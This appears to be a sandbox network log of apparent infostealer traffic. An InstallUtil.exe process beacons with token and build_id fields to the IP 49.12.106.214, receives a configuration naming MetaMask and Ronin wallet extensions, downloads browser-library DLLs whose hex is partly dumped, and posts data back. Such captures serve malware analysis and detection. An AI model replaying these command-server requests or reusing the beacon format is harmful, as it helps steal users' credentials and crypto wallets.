                                                                                                                2024-10-08 02:59:42 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------BKFBAKFCBFHIJJJJDBFCCont
2024-10-08 02:59:43 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                2024-10-08 02:59:43 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49747 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:44 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 6649
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:44 UTC6649OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------JKECGDBFCBKFIDHIDHDHCont
2024-10-08 02:59:45 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-08 02:59:45 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49748 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:45 UTC | 194 | OUT | GET /sqlp.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:45 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:45 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: close
Last-Modified: Tuesday, 08-Oct-2024 02:59:45 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a
                                                                                                                Data Ascii: $ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                Data Ascii: $2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc
                                                                                                                Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2
                                                                                                                Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24
                                                                                                                Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49749 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:48 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 4677
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:48 UTC | 4677 | OUT | Data Ascii: ------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------AKKFHDAKECFHIDHJDAAACont
2024-10-08 02:59:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-08 02:59:49 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49750 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:49 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIII
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 1529
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:49 UTC | 1529 | OUT | Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------DBKEHDGDGHCBGCAKFIIICont
2024-10-08 02:59:50 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-08 02:59:50 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49751 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:50 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:50 UTC | 437 | OUT | Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------JDBGDHIIDAEBFHJJDBFICont
2024-10-08 02:59:51 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-08 02:59:51 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49752 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:51 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:51 UTC | 437 | OUT | Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------DGIJECGDGCBKECAKFBGCCont
2024-10-08 02:59:52 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-08 02:59:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49753 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:52 UTC | 197 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:53 UTC | 261 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:52 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Tuesday, 08-Oct-2024 02:59:52 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00
                                                                                                                Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89
                                                                                                                Data Ascii: eUeLXee0@eeeue0UEeeUeee $
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45
                                                                                                                Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89
                                                                                                                Data Ascii: ,0<48%8A)$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:54 UTC | 197 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:54 UTC | 261 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:54 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Tuesday, 08-Oct-2024 02:59:54 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49756 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:55 UTC | 198 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:56 UTC | 261 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:56 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Tuesday, 08-Oct-2024 02:59:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49757 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:57 UTC | 198 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:57 UTC | 261 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:57 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Tuesday, 08-Oct-2024 02:59:57 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49764 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:59 UTC | 202 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:59 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:59 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: close
Last-Modified: Tuesday, 08-Oct-2024 02:59:59 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


